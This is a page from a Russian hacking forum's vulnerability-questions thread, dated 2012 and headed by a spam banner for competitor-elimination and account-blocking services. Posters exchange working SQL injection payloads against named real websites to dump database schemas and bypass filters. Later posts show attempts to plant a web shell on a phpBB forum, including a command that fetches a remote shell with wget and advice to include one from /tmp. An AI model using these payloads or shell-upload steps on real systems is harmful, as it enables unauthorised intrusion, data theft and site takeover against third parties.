УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2067 из 2438

2067

Опции темы

Поиск в этой теме

Опции просмотра

#20661

19.05.2012, 13:12

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Цитата:

Сообщение от None

http://dnzl.ru/view_post.php?id=80%27+and+1=0+union+select+1,user %28%29,3,4,5,6,7,8,9,10,11,12,13,14,15+--+

пздц не могу обойти. Фильтр на from table и тд...

#20662

19.05.2012, 13:14

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от shadowrun

shadowrun said:
пздц не могу обойти. Фильтр на from table и тд...

http://dnzl.ru/view_post.php?id=80%27+and+1=0+union%0Aselect+1,ta ble_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+info rmation_schema.tables--+

#20663

19.05.2012, 13:15

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

2d1v утебя выводит?

#20664

19.05.2012, 13:17

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

to shadowrun

Наглядный пример того, что все там видно!

Код:

Code:
http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+

#20665

19.05.2012, 13:19

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Цитата:

Сообщение от cat1vo

cat1vo said:
to
shadowrun
Наглядный пример того, что все там видно!

Код:

Code:
http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+

меня сюда посылает http://sweb.ru/insecure

____________

UPD

А не, всё есть спс)

#20666

19.05.2012, 13:35

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Ну или так постом

id=80'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1='1

#20667

19.05.2012, 14:41

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

как таблицы вывести тут?

http://www.yarmarka-vacancy.ru/index.php?id=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20%0afrom+information_schema .tables+--+&option=com_tpjobs&page=3&task=searchbyloc

#20668

19.05.2012, 15:27

bodrich

Guest

Сообщений: n/a

Провел на форуме:
5709

Репутация: 0

Пытаюсь загрузить шелл на форум через админку (форум phpbb 2.0.21).

Делаю это вот так:

Цитата:

Сообщение от None

Создаем файл 1.sql суем в него код
SELECT '' FROM phpbb_users LIMIT 1 INTO OUTFILE '/home/lol/htdocs/forum/shell.php';
В админке востанавливаем через бд этот файл.

Восстанавливаю через бд этот файл и мне пишет:

Цитата:

Сообщение от None

Can't create/write to file '/var/www/****/data/www/********.org/forum/shell.php' (Errcode: 13)

Это значит нет прав на запись ? (хотя если указать путь /tmp, то ошибок нет)

Пробывал вот таким вариантом:

Цитата:

Сообщение от None

Создаем текстовый файл 1.sql суем в него код
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
ну вместо 2 ставим свой id
Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца
заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.

phpinfo() выводит, а вот как загрузить шелл ? Я пытался примерно так:

Цитата:

Сообщение от None

UPDATE php2bb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system("wget http://mysite.com/shell.php")' WHERE user_id=2;

. Но увы, так не работает (

#20669

19.05.2012, 15:33

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Код:

Code:
wget http://mysite.com/shell.php

Код:

Code:
wget -O shell.php http://mysite.com/shell.php

#20670

19.05.2012, 16:26

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

bodrich

Может стоить хоть немного мат часть изучить?

1. wget'a возможно нету, или нету прав на диру.

2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")')

=\

Страница 2067 из 2438

2067

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход